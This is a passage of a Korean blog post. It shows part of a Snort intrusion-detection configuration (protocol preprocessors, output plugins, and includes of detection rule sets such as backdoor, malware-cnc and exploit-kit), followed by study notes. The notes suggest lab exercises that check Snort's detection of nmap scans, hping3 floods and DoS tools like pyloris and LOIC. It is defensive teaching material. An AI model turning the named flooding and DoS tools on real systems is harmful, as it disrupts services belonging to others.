    ftp_cmds { RNTO SDUP SITE SIZE SMNT STAT STOR STOU } \

    ftp_cmds { STRU SYST TEST TYPE USER XCUP XCRC XCWD } \

    ftp_cmds { XMAS XMD5 XMKD XPWD XRCP XRMD XRSQ XSEM } \

    ftp_cmds { XSEN XSHA1 XSHA256 } \

    alt_max_param_len 0 { ABOR CCC CDUP ESTA FEAT LPSV NOOP PASV PWD QUIT REIN STOU SYST XCUP XPWD } \

    alt_max_param_len 200 { ALLO APPE CMD HELP NLST RETR RNFR STOR STOU XMKD } \

    alt_max_param_len 256 { CWD RNTO } \

    alt_max_param_len 400 { PORT } \

    alt_max_param_len 512 { SIZE } \

    chk_str_fmt { ACCT ADAT ALLO APPE AUTH CEL CLNT CMD } \

    chk_str_fmt { CONF CWD DELE ENC EPRT EPSV ESTP HELP } \

    chk_str_fmt { LANG LIST LPRT MACB MAIL MDTM MIC MKD } \

    chk_str_fmt { MLSD MLST MODE NLST OPTS PASS PBSZ PORT } \

    chk_str_fmt { PROT REST RETR RMD RNFR RNTO SDUP SITE } \

    chk_str_fmt { SIZE SMNT STAT STOR STRU TEST TYPE USER } \

    chk_str_fmt { XCRC XCWD XMAS XMD5 XMKD XRCP XRMD XRSQ } \

    chk_str_fmt { XSEM XSEN XSHA1 XSHA256 } \

    cmd_validity ALLO < int [ char R int ] > \   

    cmd_validity EPSV < [ { char 12 | char A char L char L } ] > \

    cmd_validity MACB < string > \

    cmd_validity MDTM < [ date nnnnnnnnnnnnnn[.n[n[n]]] ] string > \

    cmd_validity MODE < char ASBCZ > \

    cmd_validity PORT < host_port > \

    cmd_validity PROT < char CSEP > \

    cmd_validity STRU < char FRPO [ string ] > \   

    cmd_validity TYPE < { char AE [ char NTC ] | char I | char L [ number ] } >

preprocessor ftp_telnet_protocol: ftp client default \

    max_resp_len 256 \

    bounce yes \

    ignore_telnet_erase_cmds yes \

    telnet_cmds yes

 

 

# SMTP normalization and anomaly detection.  For more information, see README.SMTP

preprocessor smtp: ports { 25 465 587 691 } \

    inspection_type stateful \

    b64_decode_depth 0 \

    qp_decode_depth 0 \

    bitenc_decode_depth 0 \

    uu_decode_depth 0 \

    log_mailfrom \

    log_rcptto \

    log_filename \

    log_email_hdrs \

    normalize cmds \

    normalize_cmds { ATRN AUTH BDAT CHUNKING DATA DEBUG EHLO EMAL ESAM ESND ESOM ETRN EVFY } \

    normalize_cmds { EXPN HELO HELP IDENT MAIL NOOP ONEX QUEU QUIT RCPT RSET SAML SEND SOML } \

    normalize_cmds { STARTTLS TICK TIME TURN TURNME VERB VRFY X-ADAT X-DRCP X-ERCP X-EXCH50 } \

    normalize_cmds { X-EXPS X-LINK2STATE XADR XAUTH XCIR XEXCH50 XGEN XLICENSE XQUE XSTA XTRN XUSR } \

    max_command_line_len 512 \

    max_header_line_len 1000 \

    max_response_line_len 512 \

    alt_max_command_line_len 260 { MAIL } \

    alt_max_command_line_len 300 { RCPT } \

    alt_max_command_line_len 500 { HELP HELO ETRN EHLO } \

    alt_max_command_line_len 255 { EXPN VRFY ATRN SIZE BDAT DEBUG EMAL ESAM ESND ESOM EVFY IDENT NOOP RSET } \

    alt_max_command_line_len 246 { SEND SAML SOML AUTH TURN ETRN DATA RSET QUIT ONEX QUEU STARTTLS TICK TIME TURNME VERB X-EXPS X-LINK2STATE XADR XAUTH XCIR XEXCH50 XGEN XLICENSE XQUE XSTA XTRN XUSR } \

    valid_cmds { ATRN AUTH BDAT CHUNKING DATA DEBUG EHLO EMAL ESAM ESND ESOM ETRN EVFY } \

    valid_cmds { EXPN HELO HELP IDENT MAIL NOOP ONEX QUEU QUIT RCPT RSET SAML SEND SOML } \

    valid_cmds { STARTTLS TICK TIME TURN TURNME VERB VRFY X-ADAT X-DRCP X-ERCP X-EXCH50 } \

    valid_cmds { X-EXPS X-LINK2STATE XADR XAUTH XCIR XEXCH50 XGEN XLICENSE XQUE XSTA XTRN XUSR } \

    xlink2state { enabled }

 

# Portscan detection.  For more information, see README.sfportscan

# preprocessor sfportscan: proto  { all } memcap { 10000000 } sense_level { low }

 

# ARP spoof detection.  For more information, see the Snort Manual - Configuring Snort - Preprocessors - ARP Spoof Preprocessor

# preprocessor arpspoof

# preprocessor arpspoof_detect_host: 192.168.40.1 f0:0f:00:f0:0f:00

 

# SSH anomaly detection.  For more information, see README.ssh

preprocessor ssh: server_ports { 22 } \

                  autodetect \

                  max_client_bytes 19600 \

                  max_encrypted_packets 20 \

                  max_server_version_len 100 \

                  enable_respoverflow enable_ssh1crc32 \

                  enable_srvoverflow enable_protomismatch

 

# SMB / DCE-RPC normalization and anomaly detection.  For more information, see README.dcerpc2

preprocessor dcerpc2: memcap 102400, events [co ]

preprocessor dcerpc2_server: default, policy WinXP, \

    detect [smb [139,445], tcp 135, udp 135, rpc-over-http-server 593], \

    autodetect [tcp 1025:, udp 1025:, rpc-over-http-server 1025:], \

    smb_max_chain 3, smb_invalid_shares ["C$", "D$", "ADMIN$"]

 

# DNS anomaly detection.  For more information, see README.dns

preprocessor dns: ports { 53 } enable_rdata_overflow

 

# SSL anomaly detection and traffic bypass.  For more information, see README.ssl

preprocessor ssl: ports { 443 465 563 636 989 992 993 994 995 5061 7801 7802 7900 7901 7902 7903 7904 7905 7906 7907 7908 7909 7910 7911 7912 7913 7914 7915 7916 7917 7918 7919 7920 }, trustservers, noinspect_encrypted

 

# SDF sensitive data preprocessor.  For more information see README.sensitive_data

preprocessor sensitive_data: alert_threshold 25

 

# SIP Session Initiation Protocol preprocessor.  For more information see README.sip

preprocessor sip: max_sessions 40000, \

   ports { 5060 5061 5600 }, \

   methods { invite \

             cancel \

             ack \

             bye \

             register \

             options \

             refer \

             subscribe \

             update \

             join \

             info \

             message \

             notify \

             benotify \

             do \

             qauth \

             sprack \

             publish \

             service \

             unsubscribe \

             prack }, \

   max_uri_len 512, \

   max_call_id_len 80, \

   max_requestName_len 20, \

   max_from_len 256, \

   max_to_len 256, \

   max_via_len 1024, \

   max_contact_len 512, \

   max_content_len 2048

 

# IMAP preprocessor.  For more information see README.imap

preprocessor imap: \

   ports { 143 } \

   b64_decode_depth 0 \

   qp_decode_depth 0 \

   bitenc_decode_depth 0 \

   uu_decode_depth 0

 

# POP preprocessor. For more information see README.pop

preprocessor pop: \

   ports { 110 } \

   b64_decode_depth 0 \

   qp_decode_depth 0 \

   bitenc_decode_depth 0 \

   uu_decode_depth 0

 

# Modbus preprocessor. For more information see README.modbus

preprocessor modbus: ports { 502 }

 

# DNP3 preprocessor. For more information see README.dnp3

preprocessor dnp3: ports { 20000 } \

   memcap 262144 \

   check_crc

 

# Reputation preprocessor. For more information see README.reputation

preprocessor reputation: \

   memcap 500, \

   priority whitelist, \

   nested_ip inner, \

   whitelist $WHITE_LIST_PATH/white_list.rules, \

   blacklist $BLACK_LIST_PATH/black_list.rules

 

###################################################

# Step #6: Configure output plugins

# For more information, see Snort Manual, Configuring Snort - Output Modules

###################################################

 

# unified2

# Recommended for most installs

# output unified2: filename merged.log, limit 128, nostamp, mpls_event_types, vlan_event_types

 

# Additional configuration for specific types of installs

# output alert_unified2: filename snort.alert, limit 128, nostamp

# output log_unified2: filename snort.log, limit 128, nostamp

 

# syslog

# output alert_syslog: LOG_AUTH LOG_ALERT

 

# pcap

# output log_tcpdump: tcpdump.log

 

# metadata reference data.  do not modify these lines

include classification.config

include reference.config

 

 

###################################################

# Step #7: Customize your rule set

# For more information, see Snort Manual, Writing Snort Rules

#

# NOTE: All categories are enabled in this conf file

###################################################

 

# site specific rules

include $RULE_PATH/local.rules

 

include $RULE_PATH/file-identify.rules

include $RULE_PATH/app-detect.rules

include $RULE_PATH/attack-responses.rules

include $RULE_PATH/backdoor.rules

include $RULE_PATH/bad-traffic.rules

include $RULE_PATH/blacklist.rules

include $RULE_PATH/botnet-cnc.rules

include $RULE_PATH/browser-chrome.rules

include $RULE_PATH/browser-firefox.rules

include $RULE_PATH/browser-ie.rules

include $RULE_PATH/browser-other.rules

include $RULE_PATH/browser-plugins.rules

include $RULE_PATH/browser-webkit.rules

include $RULE_PATH/chat.rules

include $RULE_PATH/content-replace.rules

include $RULE_PATH/ddos.rules

include $RULE_PATH/dns.rules

include $RULE_PATH/dos.rules

include $RULE_PATH/experimental.rules

include $RULE_PATH/exploit-kit.rules

include $RULE_PATH/exploit.rules

include $RULE_PATH/file-executable.rules

include $RULE_PATH/file-flash.rules

include $RULE_PATH/file-image.rules

include $RULE_PATH/file-java.rules

include $RULE_PATH/file-multimedia.rules

include $RULE_PATH/file-office.rules

include $RULE_PATH/file-other.rules

include $RULE_PATH/file-pdf.rules

include $RULE_PATH/finger.rules

include $RULE_PATH/ftp.rules

include $RULE_PATH/icmp-info.rules

include $RULE_PATH/icmp.rules

include $RULE_PATH/imap.rules

include $RULE_PATH/indicator-compromise.rules

include $RULE_PATH/indicator-obfuscation.rules

include $RULE_PATH/indicator-scan.rules

include $RULE_PATH/indicator-shellcode.rules

include $RULE_PATH/info.rules

include $RULE_PATH/malware-backdoor.rules

include $RULE_PATH/malware-cnc.rules

include $RULE_PATH/malware-other.rules

include $RULE_PATH/malware-tools.rules

include $RULE_PATH/misc.rules

include $RULE_PATH/multimedia.rules

include $RULE_PATH/mysql.rules

include $RULE_PATH/netbios.rules

include $RULE_PATH/nntp.rules

include $RULE_PATH/oracle.rules

include $RULE_PATH/os-linux.rules

include $RULE_PATH/os-mobile.rules

include $RULE_PATH/os-other.rules

include $RULE_PATH/os-solaris.rules

include $RULE_PATH/os-windows.rules

include $RULE_PATH/other-ids.rules

include $RULE_PATH/p2p.rules

include $RULE_PATH/phishing-spam.rules

include $RULE_PATH/policy-multimedia.rules

include $RULE_PATH/policy-other.rules

include $RULE_PATH/policy.rules

include $RULE_PATH/policy-social.rules

include $RULE_PATH/policy-spam.rules

include $RULE_PATH/pop2.rules

include $RULE_PATH/pop3.rules

include $RULE_PATH/protocol-dns.rules

include $RULE_PATH/protocol-finger.rules

include $RULE_PATH/protocol-ftp.rules

include $RULE_PATH/protocol-icmp.rules

include $RULE_PATH/protocol-imap.rules

include $RULE_PATH/protocol-nntp.rules

include $RULE_PATH/protocol-other.rules

include $RULE_PATH/protocol-pop.rules

include $RULE_PATH/protocol-rpc.rules

include $RULE_PATH/protocol-scada.rules

include $RULE_PATH/protocol-services.rules

include $RULE_PATH/protocol-snmp.rules

include $RULE_PATH/protocol-telnet.rules

include $RULE_PATH/protocol-tftp.rules

include $RULE_PATH/protocol-voip.rules

include $RULE_PATH/pua-adware.rules

include $RULE_PATH/pua-other.rules

include $RULE_PATH/pua-p2p.rules

include $RULE_PATH/pua-toolbars.rules

include $RULE_PATH/rpc.rules

include $RULE_PATH/rservices.rules

include $RULE_PATH/scada.rules

include $RULE_PATH/scan.rules

include $RULE_PATH/server-apache.rules

include $RULE_PATH/server-iis.rules

include $RULE_PATH/server-mail.rules

include $RULE_PATH/server-mssql.rules

include $RULE_PATH/server-mysql.rules

include $RULE_PATH/server-oracle.rules

include $RULE_PATH/server-other.rules

include $RULE_PATH/server-samba.rules

include $RULE_PATH/server-webapp.rules

include $RULE_PATH/shellcode.rules

include $RULE_PATH/smtp.rules

include $RULE_PATH/snmp.rules

include $RULE_PATH/specific-threats.rules

include $RULE_PATH/spyware-put.rules

include $RULE_PATH/sql.rules

include $RULE_PATH/telnet.rules

include $RULE_PATH/tftp.rules

include $RULE_PATH/virus.rules

include $RULE_PATH/voip.rules

include $RULE_PATH/web-activex.rules

include $RULE_PATH/web-attacks.rules

include $RULE_PATH/web-cgi.rules

include $RULE_PATH/web-client.rules

include $RULE_PATH/web-coldfusion.rules

include $RULE_PATH/web-frontpage.rules

include $RULE_PATH/web-iis.rules

include $RULE_PATH/web-misc.rules

include $RULE_PATH/web-php.rules

include $RULE_PATH/x11.rules

 

###################################################

# Step #8: Customize your preprocessor and decoder alerts

# For more information, see README.decoder_preproc_rules

###################################################

 

# decoder and preprocessor event rules

# include $PREPROC_RULE_PATH/preprocessor.rules

# include $PREPROC_RULE_PATH/decoder.rules

# include $PREPROC_RULE_PATH/sensitive-data.rules

 

###################################################

# Step #9: Customize your Shared Object Snort Rules

# For more information, see

# http://vrt-blog.snort.org/2009/01/using-vrt-certified-shared-object-rules.html

###################################################

 

# dynamic library rules

# include $SO_RULE_PATH/browser-ie.rules

# include $SO_RULE_PATH/browser-other.rules

# include $SO_RULE_PATH/browser-plugins.rules

# include $SO_RULE_PATH/exploit-kit.rules

# include $SO_RULE_PATH/file-executable.rules

# include $SO_RULE_PATH/file-flash.rules

# include $SO_RULE_PATH/file-image.rules

# include $SO_RULE_PATH/file-java.rules

# include $SO_RULE_PATH/file-multimedia.rules

# include $SO_RULE_PATH/file-office.rules

# include $SO_RULE_PATH/file-other.rules

# include $SO_RULE_PATH/file-pdf.rules

# include $SO_RULE_PATH/indicator-shellcode.rules

# include $SO_RULE_PATH/malware-cnc.rules

# include $SO_RULE_PATH/malware-other.rules

# include $SO_RULE_PATH/netbios.rules

# include $SO_RULE_PATH/os-linux.rules

# include $SO_RULE_PATH/os-other.rules

# include $SO_RULE_PATH/os-windows.rules

# include $SO_RULE_PATH/policy-social.rules

# include $SO_RULE_PATH/protocol-dns.rules

# include $SO_RULE_PATH/protocol-icmp.rules

# include $SO_RULE_PATH/protocol-nntp.rules

# include $SO_RULE_PATH/protocol-other.rules

# include $SO_RULE_PATH/protocol-snmp.rules

# include $SO_RULE_PATH/protocol-voip.rules

# include $SO_RULE_PATH/pua-p2p.rules

# include $SO_RULE_PATH/server-apache.rules

# include $SO_RULE_PATH/server-iis.rules

# include $SO_RULE_PATH/server-mail.rules

# include $SO_RULE_PATH/server-mysql.rules

# include $SO_RULE_PATH/server-oracle.rules

# include $SO_RULE_PATH/server-other.rules

# include $SO_RULE_PATH/server-webapp.rules

 

# legacy dynamic library rule files

# include $SO_RULE_PATH/bad-traffic.rules

# include $SO_RULE_PATH/browser-ie.rules

# include $SO_RULE_PATH/chat.rules

# include $SO_RULE_PATH/dos.rules

# include $SO_RULE_PATH/exploit.rules

# include $SO_RULE_PATH/file-flash.rules

# include $SO_RULE_PATH/icmp.rules

# include $SO_RULE_PATH/imap.rules

# include $SO_RULE_PATH/misc.rules

# include $SO_RULE_PATH/multimedia.rules

# include $SO_RULE_PATH/netbios.rules

# include $SO_RULE_PATH/nntp.rules

# include $SO_RULE_PATH/p2p.rules

# include $SO_RULE_PATH/smtp.rules

# include $SO_RULE_PATH/snmp.rules

# include $SO_RULE_PATH/specific-threats.rules

# include $SO_RULE_PATH/web-activex.rules

# include $SO_RULE_PATH/web-client.rules

# include $SO_RULE_PATH/web-iis.rules

# include $SO_RULE_PATH/web-misc.rules

 

# Event thresholding or suppression commands. See threshold.conf

include threshold.conf





[참고] Snort에 대해서 더 공부해야할 사항들


다음 사항들에 대해서 별도의 study가 필요하다.

snort rules generate => tools

snort(IDS) + preventing => IPS

snort -> DB -> WEB => tools

■ 참고 동영상(반드시 참고해 주세요)


Snort - NIDS on CentOS 6.5 - part 1/4

http://www.youtube.com/watch?v=DYBfCyd6cC0


Snort - NIDS on CentOS 6.5 - part 2/4

http://www.youtube.com/watch?v=frmZWsjPBZ8


Snort - NIDS on CentOS 6.5 - part 3/4

http://www.youtube.com/watch?v=QBwwhIBav38


Snort - NIDS on CentOS 6.5 - part 4/4

http://www.youtube.com/watch?v=II80tzwEuFk



■ Snort 룰 생성기(Snort Rule Generator)


Snort Rule Generator 사용법에 대한 유투브 동영상
http://www.youtube.com/watch?v=4Eb8S-NK6f4

프로그램 다운로드
http://dl.dropbox.com/u/4864067/snort-rules.zip

Snort Rule Generator 사용법



다음과 같은 실습을 개인적으로 진행하고 분석 보고서를 작성한다.


[실습1] 스캐닝(scanning)에 대한 snort 점검 확인

- nmap 수행결과 snort 쪽에서 확인


[실습2] 플러딩 공격(flooding attack)에 대한 snort 점검 확인

- hping3 수행 결과 snort 쪽에서 확인


[실습3] 도스 공격(dos attack)에 대한 snort 점검 확인

- pyloris-3.2 버전 수행결과 snort 쪽에서 확인

- loic 툴로 공격에 대한 snort 쪽에서 확인









ruleResult.rules


Posted by 22Hz
, |

최근에 달린 댓글

최근에 받은 트랙백

글 보관함